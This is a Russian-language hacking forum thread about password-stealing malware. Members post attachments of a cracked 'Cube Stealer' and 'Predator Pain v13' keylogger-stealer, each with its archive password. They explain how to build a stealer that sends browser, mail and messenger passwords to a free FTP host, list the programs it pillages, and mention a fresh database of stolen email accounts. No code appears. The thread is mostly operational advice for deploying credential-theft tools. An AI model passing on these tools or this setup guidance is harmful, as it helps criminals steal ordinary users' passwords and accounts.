Немного слов про Стилер


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
А кто нить может снифером его поймать, действительно-ли там троян или нет, как проверить ?
Экспериментировал с одной полезной программкой- С помощью неё можно полностью видеть все движения в системе,начиная от изменений в реестре вносимые программами,до контроля сетевой активности программ.Например наблюдая изменения в реестре при установке какой-нибудь триальной программки можно вычислить место где она "откладывает" инфу о лицензии и соответстввенно придумать способ её обхода.Решил попробовать её в качестве снифера.Олег,твой троян или не хочет работать на виртуалке или на самом деле дохлый.Для пробы запустил ещё своего антихайда и "крысу" из другой темы (правда крысе не удаётся наладить связь).Их Process Monitor отследил удачно,показав место куда они отсылают информацию.
Снимок.PNG
 
B

BioNIX

Гость
А почему ты спрашиваешь?Тоже клиентам вместе с антивирём хочешь устанавливать:)?
Нет я этого не делаю, просто нашел огромную базу и очень свежую, уведенных емейл адресов майл ру, рамблер и gmail, и все было в одном месте и есть ярлык сайта. Один продукт сделан очень тщательно не палится ни одним антивирем но имеет файлы dll так что все очень серьезно сделано и взломаны очень сложные пароли.sm3888
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Сейчас на левеле попался один очень простой в использовании стилер с отправкой ворованных паролей на ftp.Для создания билда нужно лишь ввести хост,логин и пароль для доступа к ftp.Пробовал на русском МакХосте-при тесте доступа стилер выдавал ошибки.Взял немецкий funpic.de,он был приведён в качестве примера у автора стилера.Пара минут регистрации и стилер заработал.У меня на виртуалке стоит последний фаерфокс,так вот с него пароли вытащил,как раз эту регистрацию на funpic.de.Поддерживаемые программы (из которых он тащит данные):
Internet Explorer
Firefox
Chrome
Opera
Safari

Outlook
Windows live Mail
Mozilla Thunderbird
IncrediMail

Windows Live Messenger
Trillian
Miranda
ICQ (nur alte Versionen)

Снимок.JPG


Пароли приходят в таком виде:
Снимок.JPG

Пароль:111
p.s.Сейчас заглянул на этот немецкий фтп,а там уже чьи то данные (какого-то Андерсена).Непонятно,это что общая папку что ли?Или кто то пользуется моим фтп?
Снимок.JPG
 

Вложения

  • Cube Stealer [Alpha].rar
    775.1 КБ · Просмотры: 7

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
p.s.Сейчас заглянул на этот немецкий фтп,а там уже чьи то данные (какого-то Андерсена).Непонятно,это что общая папку что ли?Или кто то пользуется моим фтп?
По идеи когда регишь фтп на хостинге, создаётся личная папка пользователя, которая никому не доступна кроме пользователю...

Тут два варианта, либо этот стиллер с наёбщиком и крадёт ваши данные фтп, либо на самом хостинге какая-то дыра, либо специально так сделали...
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Тут два варианта, либо этот стиллер с наёбщиком и крадёт ваши данные фтп, либо на самом хостинге какая-то дыра, либо специально так сделали...
Всё удалил.Больше пока лишнего ничего не появляется.
з.ы.Глядя на эти зарубежные форумы у меня сложилось впечатление,что русский хак-приват (хотя я его и не вижу) состоит из иностранного паблика.То что выкидывают в паблик (без хайда и антинуба) буржуйские кодеры-выкладывают на наших форумах под большой хайд или крутой антинуб.А то что выкладывают иностранцы под хайдом,наверное попадает в руский приват.Олег,а ты знаешь какую-нибудь известную русскую хак-прогу (окромя уфр стилера)?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
Олег,а ты знаешь какую-нибудь известную русскую хак-прогу (окромя уфр стилера)?
Да есть, меньше правда чем у буржуев...

На хеппи-хак посмотри там есть от наших, в основном всякие досерки, есть трояны и кейлоггеры не плохие...

Но наши в основном коммерцией занимаются, т.е. пишут на заказ, также на заказ и ломают, и устраивают кибер-атаки...

В паблик в основном у буржуев, хочу отметить что наши также и у буржуев выкладывают !My mind
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Ещё один стилер-кейлогер.На работоспособность не проверял,но судя по отзывам имеются небольшие косяки.У кого-то приходят отчёты только на FTP,у кого-то только на почту...Нужно экспериментировать с настройками,коих здесь большое количество.Запускать файл Predator v13 - Cracked by Meth.exe
Predator Pain v13
Снимок1.JPG
Снимок2.JPG
Снимок.JPG
Снимок3.JPG
Снимок4.JPG
Снимок5.JPG
Снимок6.JPG
Снимок7.JPG
Снимок8.JPG
Пасс:111

 

Вложения

  • Predator Pain v13 released 3.1.2014 - Cracked & Decompiled by Meth.rar
    2 МБ · Просмотры: 11

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
430
Но наши в основном коммерцией занимаются, т.е. пишут на заказ, также на заказ и ломают, и устраивают кибер-атаки...

В паблик в основном у буржуев, хочу отметить что наши также и у буржуев выкладывают !My mind


Что-то обидно за нашего брата... 100% у нас есть увлеченные гении в этой теме, которыми движет не лаве, а творческий процесс, но где они?!? Неужели буржуям за "фантики" отдаются?!?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
Что-то обидно за нашего брата... 100% у нас есть увлеченные гении в этой теме, которыми движет не лаве, а творческий процесс, но где они?!? Неужели буржуям за "фантики" отдаются?!?
А ради кого стараться ?

Пробегитесь даже здесь по форуму, никому это всё не интересно...NO-no!!!
 
Верх Низ